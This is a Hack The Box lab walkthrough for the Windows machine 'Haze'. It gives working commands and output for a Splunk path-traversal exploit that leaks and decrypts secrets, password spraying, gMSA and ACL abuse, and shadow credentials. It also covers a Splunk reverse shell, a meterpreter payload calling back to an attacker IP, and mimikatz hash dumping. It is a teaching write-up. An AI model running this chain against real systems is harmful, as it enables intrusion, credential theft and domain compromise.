Hack The Box / WINDOWS / 2026-03-18
Hack The Box — Haze (Windows)
A Splunk path traversal leaks secrets and LDAP bind credentials, enabling AD pivoting through reused passwords and gMSA abuse, then shadow credentials and Splunk admin RCE lead to SYSTEM and Administrator compromise.
Target
- IP:
10.129.21.181
Recon
sudo nmap -sC -sV 10.129.21.181 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-02 21:06:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: E60C968E8FF3CC2F4FB869588E83AFC6
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.129.21.181:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
8088/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after: 2028-03-04T07:29:08
| MD5: 82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
|_SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
|_http-server-header: Splunkd
|_http-title: 404 Not Found
| http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
8089/tcp open ssl/http Splunkd httpd
|_http-server-header: Splunkd
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after: 2028-03-04T07:29:08
| MD5: 82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
|_SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry
|_/
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49680/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49684/tcp open msrpc Microsoft Windows RPC
58531/tcp open msrpc Microsoft Windows RPC
58534/tcp open msrpc Microsoft Windows RPC
58545/tcp open msrpc Microsoft Windows RPC
58560/tcp open msrpc Microsoft Windows RPC
59065/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Add dc01.haze.htb and haze.htb to /etc/hosts.
Browse to http://10.129.21.181:8000/.
It is Splunk Enterprise.
Browse to https://10.129.21.181:8088/.
From the certificate we get:
emailAddress = support@splunk.com
CN = SplunkCommonCA
O = Splunk
L = San Francisco
ST = CA
C = US
Browse to https://10.129.21.181:8089/.
We see:
Updated: 2025-04-02T15:10:45-07:00 Splunk build: 9.2.1
So we have the version.
Initial Access via Splunk Traversal
There is a vulnerability (CVE-2024-36991) with a public exploit.
git clone https://github.com/bigb0x/CVE-2024-36991.git
python3 CVE-2024-36991/CVE-2024-36991.py -u 'http://10.129.21.181:8000'
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152
The exploit sends this request:
http://10.129.21.181:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
So this is a directory traversal issue.
Open this URL manually:
http://10.129.21.181:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
You can intercept and replay it in Burp Repeater.
It leaks Splunk password hashes (same values printed by the exploit).
This page explains Splunk hash format:
https://asecuritysite.com/hash/splunk_hash
Create file hash:
admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1
edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1
mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/
paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1
Try cracking:
./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt --username
No crack.
Note: Local Splunk Lab (optional)
This machine does not require this step, but here is a useful way to inspect Splunk locally.
docker run -d -p 8000:8000 -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=password" --name splunk splunk/splunk:latest
docker ps -a
Copy container ID and enter the container:
docker exec -u0 -it c851fa2860c4 bash
You can browse /opt/splunk.
That image is RHEL-based and tooling is limited, so we can also use Ubuntu.
docker run -it ubuntu:latest
apt update
apt install curl wget vim
Download Splunk without registration by scraping direct links:
curl https://www.splunk.com/en_us/download/splunk-enterprise.html | grep data-link
For example:
cd /opt
wget https://download.splunk.com/products/splunk/releases/9.4.1/linux/splunk-9.4.1-e3bdab203ac8-linux-amd64.tgz
tar xvf splunk-9.4.1-e3bdab203ac8-linux-amd64.tgz
cd splunk
vim etc/splunk-launch.conf
Add this line:
OPTIMISTIC_ABOUT_FILE_LOCKING=1
Start Splunk:
./bin/splunk start
Now you can inspect the filesystem and decrypt test values safely.
Extract and Decrypt Splunk Secrets
From public docs and research we know Splunk secret material is in etc/auth/splunk.secret.
Leak it via traversal:
/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/auth/splunk.secret
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
Leak server.conf too:
/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/server.conf
[general]
serverName = dc01
pass4SymmKey = $7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA==
[sslConfig]
sslPassword = $7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw==
In the local Splunk lab, replace its splunk.secret with the target one, then decrypt:
./bin/splunk show-decrypted --value '$7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA=='
changeme
./bin/splunk show-decrypted --value '$7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw=='
password
Alternative: splunksecrets.
pip3 install splunksecrets
Put leaked secret into secret.txt and run:
splunksecrets splunk-decrypt --splunk-secret secret.txt
Provide encrypted value and get plaintext.
Those two decrypted values are not directly useful for compromise.
Leak LDAP auth config:
/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/authentication.conf
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
Decrypt bindDNpassword with either splunk show-decrypted or splunksecrets.
Recovered password:
Ld@p_Auth_Sp1unk@2k24
User is Paul Taylor.
AD Pivoting
Put paul.taylor in users.txt and validate user:
./kerbrute userenum -d haze.htb --dc dc01.haze.htb ./users.txt
2025/04/02 19:31:32 > [+] VALID USERNAME: paul.taylor@haze.htb
Try SMB with recovered creds:
nxc smb dc01.haze.htb -d haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --shares
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 [*] Enumerated shares
SMB 10.10.11.61 445 DC01 Share Permissions Remark
SMB 10.10.11.61 445 DC01 ----- ----------- ------
SMB 10.10.11.61 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.61 445 DC01 C$ Default share
SMB 10.10.11.61 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.61 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.61 445 DC01 SYSVOL READ Logon server share
LDAP also works:
nxc ldap dc01.haze.htb -d haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.61 389 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
Enumerate users:
nxc smb dc01.haze.htb -d haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users_2.txt
Run password spray (after time sync):
sudo ntpdate dc01.haze.htb
./kerbrute --dc dc01.haze.htb -d haze.htb -v passwordspray users_2.txt 'Ld@p_Auth_Sp1unk@2k24'
2025/04/03 07:27:32 > [+] VALID LOGIN: paul.taylor@haze.htb:Ld@p_Auth_Sp1unk@2k24
2025/04/03 07:27:32 > [+] VALID LOGIN: mark.adams@haze.htb:Ld@p_Auth_Sp1unk@2k24
Get shell as Mark:
evil-winrm -i dc01.haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24'
gMSA Abuse and Shadow Credentials
Collect BloodHound data:
bloodhound-python -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -ns 10.10.11.61 -d 'haze.htb' -dc 'dc01.haze.htb' -c All --zip
Then:
sudo neo4j console
bloodhound --no-sandbox
Upload the zip.
For mark.adams in Node Info → Transitive Object Control, we see he is member of gmsa_managers.
On target:
Get-ADServiceAccount 'Haze-IT-Backup$'
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled : True
Name : Haze-IT-Backup
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780
SamAccountName : Haze-IT-Backup$
SID : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :
This is a Group Managed Service Account (gMSA).
Run gMSADumper (https://github.com/micahvandeusen/gMSADumper):
python3 gMSADumper/gMSADumper.py -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb
Users or groups who can read password for Haze-IT-Backup$:
> Domain Admins
Check retrieval principals:
Get-ADServiceAccount 'Haze-IT-Backup$' -Properties PrincipalsAllowedToRetrieveManagedPassword
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled : True
Name : Haze-IT-Backup
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Domain Admins,CN=Users,DC=haze,DC=htb}
SamAccountName : Haze-IT-Backup$
SID : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :
Change it:
Set-ADServiceAccount 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'
Upload and run GMSAPasswordReader.exe:
.\GMSAPasswordReader --AccountName 'Haze-IT-Backup$'
[*] Input username : Haze-IT-Backup$
[*] Input domain : HAZE.HTB
[*] Salt : HAZE.HTBHaze-IT-Backup$
[*] rc4_hmac : 735C02C6B2DC54C3C8C6891F55279EBC
[*] aes128_cts_hmac_sha1 : FDE2DBD661BE96B4AC1F68036104A22B
[*] aes256_cts_hmac_sha1 : BBD639BFE8461AEC4F850A5500422767C4EF51E9FD26D0003C9653ED4571EA15
[*] des_cbc_md5 : 9EA2310B9D2A94AB
Use hash to request TGT:
getTGT.py 'haze.htb'/'Haze-IT-Backup$' -hashes ':735C02C6B2DC54C3C8C6891F55279EBC' -dc-ip 10.10.11.61
[*] Saving ticket in Haze-IT-Backup$.ccache
export KRB5CCNAME='Haze-IT-Backup$.ccache'
BloodHound shows Haze-IT-Backup$ has WriteOwner on group support_services.
owneredit.py -action write -new-owner 'Haze-IT-Backup$' -target 'support_services' -dc-ip 10.10.11.61 -k -no-pass 'haze.htb'/'Haze-IT-Backup$'
[*] Current owner information below
[*] - SID: S-1-5-21-323145914-28650650-2368316563-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=haze,DC=htb
[*] OwnerSid modified successfully!
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'Haze-IT-Backup$' -target 'support_services' -dc-ip 10.10.11.61 -k -no-pass 'haze.htb'/'Haze-IT-Backup$'
[*] DACL backed up to dacledit-20250403-101115.bak
[*] DACL modified successfully!
python3 bloodyAD/bloodyAD.py --host 'dc01.haze.htb' -d haze.htb --dc-ip 10.10.11.61 -k add genericAll 'support_services' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ has now GenericAll on support_services
python3 bloodyAD/bloodyAD.py --host 'dc01.haze.htb' -d haze.htb --dc-ip 10.10.11.61 -k add groupMember 'support_services' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ added to support_services
Use pyWhisker for shadow credentials:
git clone https://github.com/ShutdownRepo/pywhisker.git
python3 pywhisker/pywhisker.py -d 'haze.htb' -u 'Haze-IT-Backup$' -H '735C02C6B2DC54C3C8C6891F55279EBC' --target 'edward.martin' --action 'add'
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: eb654fd5-4612-f97d-22bb-3484012bcc1e
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: qmryplGi.pfx
[*] Must be used with password: wWiGgGgZnOdfIG7KtIAl
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Get NT hash through cert auth:
certipy cert -export -pfx qmryplGi.pfx -password wWiGgGgZnOdfIG7KtIAl -out "unprotected.pfx"
certipy auth -pfx unprotected.pfx -dc-ip 10.10.11.61 -username 'edward.martin' -domain 'haze.htb'
[*] Got hash for 'edward.martin@haze.htb': aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af
Get shell:
evil-winrm -i 10.10.11.61 -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'
Splunk Backup and Admin Compromise
Inside shell:
cd C:\Backups\Splunk
ls
There is file splunk_backup_2024-08-06.zip.
Transfer it to attacker machine.
On attacker:
smbserver.py -smb2support -username test12 -password test12 share $(pwd)
On target:
net use \\10.10.15.10\share test12 /USER:test12
cp splunk_backup_2024-08-06.zip \\10.10.15.10\share\
On attacker:
unzip splunk_backup_2024-08-06.zip
cd Splunk
find . -name authentication.conf
./etc/system/default/authentication.conf
./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
./var/run/splunk/confsnapshot/baseline_default/system/default/authentication.conf
Inspect local baseline:
cat ./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
We see:
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
Use splunksecrets legacy decrypt:
splunksecrets splunk-legacy-decrypt --splunk-secret etc/auth/splunk.secret
Insert $1$YDz8WfhoCWmf6aTRkA+QqUI= and recover:
Sp1unkadmin@2k24
Log in to http://10.129.21.181:8000/ with:
admin:Sp1unkadmin@2k24
Use this Splunk reverse-shell method:
https://github.com/0xjpuff/reverse_shell_splunk
Start listener:
rlwrap nc -vlnp 4444
Follow repository steps and get reverse shell.
whoami
haze\alexander.green
whoami /priv
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Generate and run meterpreter to escalate:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.15.10 LPORT=4444 -f exe -o reverse.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run
On target:
.\reverse.exe
In meterpreter:
getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
getuid
Server username: NT AUTHORITY\SYSTEM
Then:
shell
Now retrieve root flag from Administrator desktop.
Bonus: Administrator NTLM Hash
Upload mimikatz:
https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe
curl http://192.168.99.1:5555/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe "lsadump::sam" exit
Output includes:
Domain : DC01
SysKey : 7ec056149ebcce76129c0b9f327f8308
Local SID : S-1-5-21-466278413-650384940-2880913266
SAMKey : 72cd7f59f8d65f63ae093407583ae822
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3aac437da6f5ae94b01a6e5347dd920